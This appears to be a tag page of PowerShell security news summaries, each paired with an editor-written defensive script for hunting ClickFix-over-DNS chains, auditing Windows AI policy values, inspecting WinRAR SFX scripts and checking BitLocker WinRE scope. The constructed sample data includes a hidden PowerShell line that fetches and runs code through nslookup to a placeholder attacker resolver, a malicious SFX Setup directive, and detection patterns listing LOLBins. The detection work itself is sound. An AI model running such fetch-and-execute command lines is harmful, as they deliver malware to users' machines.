Tag

PowerShell

All articles tagged with #powershell

DNS Channel Used to Deliver PowerShell Payload in ClickFix Attacks
technology, 12 days ago

A new ClickFix variant delivers its payload over DNS instead of HTTP. Victims are told to run nslookup from the Run dialog against an attacker-controlled DNS server; the DNS response carries a PowerShell payload that, once executed, downloads a ZIP containing a Python runtime and malware scripts, establishes persistence, and installs ModeloRAT. This is the first reported use of DNS to stage and deliver ClickFix payloads. It lets the operator swap the payload on the fly and makes the delivery blend into ordinary DNS traffic, where most egress controls and proxies never look.
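The chain described above leaves a distinctive trace in process-creation telemetry: an interactive nslookup aimed at a resolver the organisation does not own, with PowerShell started near it carrying the usual in-memory-execution flags. The function below is an added example by the editor, not code from the article or from the reported campaign. It assumes records shaped like Sysmon Event ID 1 (UtcTime, Image, CommandLine, ParentImage); the three sample records are constructed, and the resolver address and domain in them are placeholders.

```powershell
# Added example (editor's): hunt for the ClickFix-over-DNS chain in process-creation
# events. Assumes Sysmon Event ID 1 field names; sample events below are constructed.

function Find-DnsClickFixChain {
    param(
        [Parameter(Mandatory)] [object[]] $Events,
        [string[]] $TrustedResolvers = @(),    # your own DNS servers, to suppress admin lookups
        [int] $WindowSeconds = 120
    )

    foreach ($lookup in $Events) {
        if ($lookup.Image -notmatch '\\nslookup\.exe$') { continue }

        # nslookup syntax: nslookup [-options] host [server]. A second positional token
        # is an explicit resolver, which interactive users almost never type themselves.
        $positional = @($lookup.CommandLine -split '\s+' |
            Where-Object { $_ -and $_ -notmatch '^-' -and $_ -notmatch 'nslookup' })
        if ($positional.Count -lt 2) { continue }
        $resolver = $positional[1]
        if ($TrustedResolvers -contains $resolver) { continue }

        # The Run dialog is hosted by explorer.exe, so that parent strongly suggests a user
        # following pasted instructions rather than an automated job.
        $fromRunDialog = $lookup.ParentImage -match '\\explorer\.exe$'

        # The payload may start after the lookup (victim pastes the answer) or may itself
        # have launched nslookup, so look in both directions inside the window.
        $t0 = [datetime]::Parse($lookup.UtcTime)
        foreach ($ev in $Events) {
            if ($ev.Image -notmatch '\\(powershell|pwsh)\.exe$') { continue }
            $dt = ([datetime]::Parse($ev.UtcTime) - $t0).TotalSeconds
            if ([math]::Abs($dt) -gt $WindowSeconds) { continue }
            if ($ev.CommandLine -notmatch 'iex|invoke-expression|-enc|-e\s|-w\s+hidden|windowstyle') { continue }

            [pscustomobject]@{
                LookupTime    = $lookup.UtcTime
                Resolver      = $resolver
                FromRunDialog = $fromRunDialog
                Lookup        = $lookup.CommandLine
                Payload       = $ev.CommandLine
            }
        }
    }
}

# Constructed sample telemetry: one ClickFix chain and one benign admin lookup.
$sampleEvents = @(
    [pscustomobject]@{ UtcTime = '2025-01-10 09:00:01'
                       Image = 'C:\Windows\System32\nslookup.exe'
                       CommandLine = 'nslookup -type=txt cfg.example.invalid 203.0.113.10'
                       ParentImage = 'C:\Windows\explorer.exe' }
    [pscustomobject]@{ UtcTime = '2025-01-10 09:00:07'
                       Image = 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
                       CommandLine = 'powershell -w hidden -ep bypass -c "iex (nslookup -type=txt cfg.example.invalid 203.0.113.10)"'
                       ParentImage = 'C:\Windows\explorer.exe' }
    [pscustomobject]@{ UtcTime = '2025-01-10 09:15:00'
                       Image = 'C:\Windows\System32\nslookup.exe'
                       CommandLine = 'nslookup mail.corp.example 10.0.0.53'
                       ParentImage = 'C:\Windows\System32\cmd.exe' }
)

# Prints one hit: the 09:00 lookup against 203.0.113.10 paired with the hidden PowerShell.
Find-DnsClickFixChain -Events $sampleEvents -TrustedResolvers '10.0.0.53' | Format-List
```

On a live host, feed it the same fields pulled from `Get-WinEvent -FilterHashtable @{LogName='Microsoft-Windows-Sysmon/Operational'; Id=1}` or from your EDR's process export. Pair the rule with DNS query logging (Sysmon Event ID 22 or resolver logs): a TXT query answered by a server outside your resolver list is the network-side half of the same chain, and blocking outbound port 53 to anything but your resolvers removes the channel entirely.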

GitHub Script Lets Windows 11 Users Turn Off Built-In AI
technology, 1 month ago

Remove Windows AI, a PowerShell script published on GitHub by Zoicware, lets Windows 11 users disable built-in AI features such as Copilot, Recall, and Windows Studio Effects, whether for privacy or simply for a leaner OS. The script is actively maintained and updated as Microsoft adds AI components, and users are encouraged to report registry keys or features it misses so they can be covered in later releases.
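Two checks a cautious user wants around any third-party hardening script: that the copy being run is the copy that was reviewed, and that it actually changed the settings it claims to. The block below is an added example by the editor, not code from the Remove Windows AI project. The registry paths are the Group Policy backing values for turning off Copilot and Recall snapshot saving as the editor understands Microsoft's documentation; treat them as an assumption to verify against current docs, and note that the script file name in the usage line is a placeholder.

```powershell
# Added example (editor's, not the project's code). Registry locations are assumed from
# Microsoft's policy documentation; confirm them before relying on the output.

function Test-PinnedScriptHash {
    param(
        [Parameter(Mandatory)] [string] $Path,
        [Parameter(Mandatory)] [string] $ExpectedSha256   # recorded when you read the script
    )
    $actual = (Get-FileHash -Path $Path -Algorithm SHA256).Hash
    return ($actual -ieq $ExpectedSha256)
}

function Get-WindowsAiPolicyState {
    $checks = @(
        @{ Feature = 'Copilot (user policy)'
           Path    = 'HKCU:\Software\Policies\Microsoft\Windows\WindowsCopilot'
           Name    = 'TurnOffWindowsCopilot'; Expected = 1 }
        @{ Feature = 'Recall snapshots (user policy)'
           Path    = 'HKCU:\Software\Policies\Microsoft\Windows\WindowsAI'
           Name    = 'DisableAIDataAnalysis'; Expected = 1 }
        @{ Feature = 'Recall snapshots (machine policy)'
           Path    = 'HKLM:\Software\Policies\Microsoft\Windows\WindowsAI'
           Name    = 'DisableAIDataAnalysis'; Expected = 1 }
    )
    foreach ($c in $checks) {
        $value = $null
        if (Test-Path -Path $c.Path) {
            $item = Get-ItemProperty -Path $c.Path -Name $c.Name -ErrorAction SilentlyContinue
            if ($item) { $value = $item.($c.Name) }
        }
        [pscustomobject]@{
            Feature  = $c.Feature
            Key      = "$($c.Path)\$($c.Name)"
            Current  = $value                 # $null means the value is not set at all
            Disabled = ($value -eq $c.Expected)
        }
    }
}

# Usage: pin the hash once after reviewing the script, then gate execution on it
# (script name is a placeholder):
# if (Test-PinnedScriptHash -Path .\script.ps1 -ExpectedSha256 '<hash you recorded>') { & .\script.ps1 }
Get-WindowsAiPolicyState | Format-Table -AutoSize
```

Run the audit before and after the script to see exactly which values moved. A policy value reports the configured intent only; whether a given build still honours it is something to confirm in the UI, which is also why a script of this kind needs the ongoing maintenance the article describes.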

Undetectable PowerShell Execution via WinRAR SFX Archives
cybersecurity, 2 years ago

Attackers are using WinRAR self-extracting (SFX) archives to plant backdoors without triggering security agents on the target system. The archives are password-protected and contain harmless decoy files, but their SFX script has been modified so that extraction also launches PowerShell, the Windows command prompt, and Task Manager with system privileges. Because the visible content is benign and the archive body is encrypted, traditional antivirus is unlikely to flag it. Inspect SFX archives with a tool that shows the embedded script, and look for commands scheduled to run on extraction.
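The "check the content of SFX archives" advice can be done without executing anything: WinRAR stores the SFX script (Setup=, Presetup=, Silent=, Overwrite=, Path= and friends) as the archive comment, which sits after the RAR signature inside the .exe. The function below is an added example by the editor, not code from the article. It scans the raw bytes for those directives and reports whether the Setup/Presetup lines launch an interpreter or a living-off-the-land binary. The sample bytes are constructed to mimic such a file; they are not a real sample, and the file paths in them are placeholders.

```powershell
# Added example (editor's): read the SFX script out of a WinRAR self-extracting .exe.
# Sample bytes below are constructed, not a captured malware sample.

function Get-SfxScriptCommands {
    param([Parameter(Mandatory)] [byte[]] $Bytes)

    $text   = [System.Text.Encoding]::ASCII.GetString($Bytes)
    $rarSig = 'Rar!' + [char]0x1A + [char]0x07        # shared prefix of the RAR 4 and RAR 5 signatures
    $sigAt  = $text.IndexOf($rarSig, [System.StringComparison]::Ordinal)

    $result = [ordered]@{ IsRarSfx = $false; Directives = @(); LaunchesInterpreter = $false; Silent = $false }
    if ($sigAt -lt 0) { return [pscustomobject]$result }
    $result.IsRarSfx = $true

    # One directive per line, KEY=value, case-insensitive. Scan from the signature onward
    # so strings inside the SFX stub itself do not produce false hits.
    $keys  = 'Setup|Presetup|Silent|Overwrite|Path|Delete|Shortcut|Title|Text|License|Update|SetupCode'
    $found = [regex]::Matches($text.Substring($sigAt), "(?im)^[ \t]*(?:$keys)=[^\r\n]*")
    $result.Directives = @($found | ForEach-Object { $_.Value.Trim() })

    # Setup/Presetup lines that start an interpreter or LOLBin are the payload; Silent=1/2
    # hides the extraction dialog so the victim only ever sees the decoy document.
    $launchers = 'powershell|pwsh|cmd(\.exe)?\b|wscript|cscript|mshta|rundll32|regsvr32|taskmgr'
    $result.LaunchesInterpreter = [bool]@($result.Directives | Where-Object {
        $_ -match '^(Setup|Presetup)=' -and $_ -match $launchers })
    $result.Silent = [bool]@($result.Directives | Where-Object { $_ -match '^Silent=[12]' })
    [pscustomobject]$result
}

# Constructed stand-in for an SFX: fake PE stub, RAR 5 signature, SFX comment, decoy name.
$stub    = [System.Text.Encoding]::ASCII.GetBytes('MZ' + ('x' * 48) + 'This program cannot be run in DOS mode')
$rar5Sig = [byte[]](0x52, 0x61, 0x72, 0x21, 0x1A, 0x07, 0x01, 0x00)
$comment = [System.Text.Encoding]::ASCII.GetBytes(
    "`r`nPath=%TEMP%\invoice`r`nSilent=1`r`nOverwrite=1`r`n" +
    "Setup=powershell.exe -w hidden -ep bypass -File %TEMP%\invoice\unpack.ps1`r`n")
$decoy   = [System.Text.Encoding]::ASCII.GetBytes('invoice.pdf' + ('x' * 32))
$sample  = $stub + $rar5Sig + $comment + $decoy

# Reports IsRarSfx=True, four directives, LaunchesInterpreter=True, Silent=True.
Get-SfxScriptCommands -Bytes $sample

# For a real file:
# Get-SfxScriptCommands -Bytes ([System.IO.File]::ReadAllBytes('C:\samples\suspect.exe'))
```

Legitimate installers also use Setup=, so triage on what the line launches rather than on its presence. If the result shows IsRarSfx=True but no directives, the comment may be stored in a form this plain scan cannot read; dump it with unrar's comment-write command (cw) instead, which still does not execute the stub.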

Microsoft addresses BitLocker vulnerabilities with PowerShell scripts
cybersecurity, 2 years ago

Microsoft has released PowerShell scripts that update Windows Recovery Environment (WinRE) images to close a BitLocker security-feature bypass affecting Windows 10 and 11. The bypass could give an attacker access to encrypted data on the device's storage. The scripts let enterprises patch the WinRE image on managed devices automatically rather than by hand. The flaw is only exploitable on systems that have winre.wim on the recovery partition, so devices without it are out of scope.
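Before running a fleet-wide remediation it helps to know which machines are in scope and which already carry an updated image. The block below is an added example by the editor, not Microsoft's remediation script. It parses the output of reagentc /info to learn whether WinRE is enabled and on which disk and partition winre.wim lives, then compares a WinRE image build against the running OS build: because the fix is delivered by updating the WinRE image, a WinRE revision that lags the OS is the sign that the fix has not been applied. The reagentc text and the version numbers used are constructed in the format the tool prints.

```powershell
# Added example (editor's, not Microsoft's script). The reagentc lines and versions are
# constructed; on a real machine substitute the live values as shown in the usage note.

function ConvertFrom-ReagentcInfo {
    param([Parameter(Mandatory)] [string[]] $Lines)
    $info = [ordered]@{ Enabled = $false; Location = $null; DiskNumber = $null; PartitionNumber = $null }
    foreach ($line in $Lines) {
        if ($line -match '^\s*Windows RE status:\s+(\S+)') {
            $info.Enabled = ($Matches[1] -eq 'Enabled')
        }
        elseif ($line -match '^\s*Windows RE location:\s+(\S+)') {
            $info.Location = $Matches[1]
            # The location is a \\?\GLOBALROOT\device\harddiskN\partitionM\... path; the disk
            # and partition numbers are what you need to mount the recovery partition.
            if ($info.Location -match 'harddisk(\d+)\\partition(\d+)') {
                $info.DiskNumber      = [int]$Matches[1]
                $info.PartitionNumber = [int]$Matches[2]
            }
        }
    }
    [pscustomobject]$info
}

function Test-WinReNeedsUpdate {
    param(
        [Parameter(Mandatory)] [version] $WinReVersion,   # build of the winre.wim image
        [Parameter(Mandatory)] [version] $OsVersion       # 10.0.<CurrentBuild>.<UBR> of the running OS
    )
    # Same major.minor.build is expected on a given OS; the fix lands in the revision field.
    return ($WinReVersion -lt $OsVersion)
}

# Constructed reagentc /info output in the tool's own layout (BCD GUID is a placeholder).
$sampleReagentc = @(
    'Windows Recovery Environment (Windows RE) and system reset configuration'
    'Information:'
    ''
    '    Windows RE status:         Enabled'
    '    Windows RE location:       \\?\GLOBALROOT\device\harddisk0\partition4\Recovery\WindowsRE'
    '    Boot Configuration Data (BCD) identifier: 00000000-0000-0000-0000-000000000000'
    '    Recovery image location:'
    '    Recovery image index:      0'
    ''
    'REAGENTC.EXE: Operation Successful.'
)

# Enabled=True, DiskNumber=0, PartitionNumber=4: this machine is in scope for the fix.
ConvertFrom-ReagentcInfo -Lines $sampleReagentc

# Constructed versions: OS at revision 2364, WinRE image still at 1105, so it needs the update.
Test-WinReNeedsUpdate -WinReVersion '10.0.22621.1105' -OsVersion '10.0.22621.2364'
```

On a live system, pass the real output with `ConvertFrom-ReagentcInfo -Lines (reagentc /info)`; build the OS version from the CurrentBuild and UBR values under `HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion`, and read the WinRE image version with DISM's image-info query on winre.wim after giving the recovery partition a drive letter (it has none by default). A machine where WinRE is disabled, or where no winre.wim is present on the recovery partition, is not exploitable and does not need the script.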